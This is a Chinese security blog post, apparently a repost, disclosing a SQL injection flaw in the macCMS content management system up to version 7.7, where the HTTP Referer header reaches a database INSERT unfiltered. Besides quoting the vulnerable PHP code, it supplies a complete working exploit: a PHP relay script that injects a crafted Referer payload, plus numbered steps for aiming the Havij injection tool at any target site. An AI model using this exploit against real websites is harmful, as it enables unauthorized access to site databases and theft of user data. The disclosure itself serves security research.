macCMS 全版本通杀SQL注射(包括最新7.x)

没穿底裤 2019年12月31日20:09:19评论343 views字数 1435阅读4分47秒阅读模式
摘要

本次针对官网最新7.7版本的maccms测试,和之前的6.x注射有一些差异(重构了代码,而且用了360给的防护脚本)
结合之前无人认领的旧版注射,可以达到全版本注射
/user/index.php line:615
[php]
function tg() //推广功能,吐槽一下之前6.x版本用的英文popularize,这就变拼音了

本次针对官网最新7.7版本的maccms测试,和之前的6.x注射有一些差异(重构了代码,而且用了360给的防护脚本)
结合之前无人认领的旧版注射,可以达到全版本注射
/user/index.php line:615
[php]
function tg() //推广功能,吐槽一下之前6.x版本用的英文popularize,这就变拼音了

{

global $db;

$userid = be("get","uid"); $userid=chkSql($userid,true); //完全不可控

if (!chkGlobalCache("tjlastdate")){ setGlobalCache ("tjlastdate", date('Y-m-d'),0); }

if (isNum($userid)){

$ip = getIP(); //我本以为用到了360的过滤脚本

$ly= getReferer(); //我本以为用到了360的过滤脚本,见后面跟踪

$row = $db->getRow("select * from {pre}user where u_id=" . $userid ."");

if ($row){ //这里不要误会,不是需要你登陆后注射,而是你填一个合法的“推广者”id即可,填1绝对可行,除非整个网站没有会员

$sql="Select * From {pre}user_visit where uv_uid = " .$userid." and uv_ip ='".$ip."' and STR_TO_DATE(uv_time,'%Y-%m-%d')='".date("Y-m-d")."'"; //不在这里exploit,控制referer容易点

$row1 = $db->getRow($sql);

if (!$row1){

$db->Add ("{pre}user_visit",array("uv_uid","uv_ip","uv_ly","uv_time"), array($userid,$ip,$ly, date("Y-m-d H:i:s")));

//ly变量进入了查询,小心后面还有个date,之后构造的时候不能忘记

//和以下代码无关

$db->query ("update {pre}user set u_tj=u_tj+1,u_points=u_points+" . app_popularize . " where u_id=". $userid);

if ( strpos( ",". date('Y-m-d H:i:s',time()), getGlobalCache("tjlastdate") ) <=0 ) {

$sql="delete from {pre}user_visit whereSTR_TO_DATE(uv_time,'%Y-%m-%d')<'".date("Y-m-d")."'";

$db->query($sql);

setGlobalCache ("tjlastdate", date('Y-m-d') , 0);

}

}

unset($row1);

}

unset($row);

}

redirect ("../");

}[/php]
对比,和6.x的差异在于代码重构了,360也给了一个过滤的脚本,但是……
/inc/function.php line:248
[php]
function getReferer()

{

return $_SERVER["HTTP_REFERER"];

}
[/php]
360的过滤脚本哭了,根本就没出场的镜头……
好吧,原理分析完了,证明危害继续给出poc
由于在referer里面,又需要构造一下后面的date,于是自己写php中转请求
原理是转发请求,同时方便地提供$_GET["a"]用来把注射语句合进referer
至于date 我直接就构造 now 了,见下文代码
alkaid.php
[php]
function uc_fopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE,$inject) {
$return = '';
$matches = parse_url($url);
!isset($matches['host']) && $matches['host'] = '';
!isset($matches['path']) && $matches['path'] = '';
!isset($matches['query']) && $matches['query'] = '';
!isset($matches['port']) && $matches['port'] = '';
$host = $matches['host'];
$path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/';
$port = !empty($matches['port']) ? $matches['port'] : 80;
if($post) {
$out = "POST $path HTTP/1.0/r/n";
$out .= "Accept: **/r/n";
//$out .= "Referer: $boardurl/r/n";
$out .= "Accept-Language: zh-cn/r/n";
$out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]/r/n";
$out .= "Host: $host/r/n";
$out .= "Connection: Close/r/n";
$out .= "Cookie: $cookie/r/n/r/n";
}else {
$out = "GET $path HTTP/1.0/r/n";
$out .= "Accept: */*/r/n";
$out .= "Referer: a',(select now()) and ".$inject.")#/r/n";
$out .= "Accept-Language: zh-cn/r/n";
$out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]/r/n";
$out .= "Host: $host/r/n";
$out .= "Connection: Close/r/n";
$out .= "Cookie: $cookie/r/n/r/n";
}
$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);

if(!$fp) {

return '';//note $errstr : $errno /r/n

} else {
stream_set_blocking($fp, $block);
stream_set_timeout($fp, $timeout);
@fwrite($fp, $out);
$status = stream_get_meta_data($fp);
if(!$status['timed_out']) {

while (!feof($fp)) {

if(($header = @fgets($fp)) && ($header == "/r/n" || $header == "/n")) {
break;
}
}
$stop = false;
while(!feof($fp) && !$stop) {
$data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
$return .= $data;
if($limit) {
$limit -= strlen($data);
$stop = $limit <= 0;
}
}
}
@fclose($fp);
return $return;
}
}
uc_fopen('http://127.0.0.1/user/?action=tg&uid=1',0,0,0,FALSE,'',15,true,$_GET["a"]);
echo 'hi';
?>[/php]
用Havij扫描
http://127.0.0.1/alkaid.php?a=1%3d1
就会把构造好的referer发送到http://127.0.0.1/user/?action=tg&uid=1上
用法:
1.把alkaid.php本地搭建起来
2.修改alkaid.php倒数几行,把http://127.0.0.1/user/?action=tg&uid=1改成对应的测试地址,uid填一个存在的用户即可,自己本身无需登录
3.havij 直射本地alkaid.php http://127.0.0.1/alkaid.php?a=1%3d1
macCMS 全版本通杀SQL注射(包括最新7.x)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日20:09:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   macCMS 全版本通杀SQL注射(包括最新7.x)https://cn-sec.com/archives/75391.html

发表评论

匿名网友 填写信息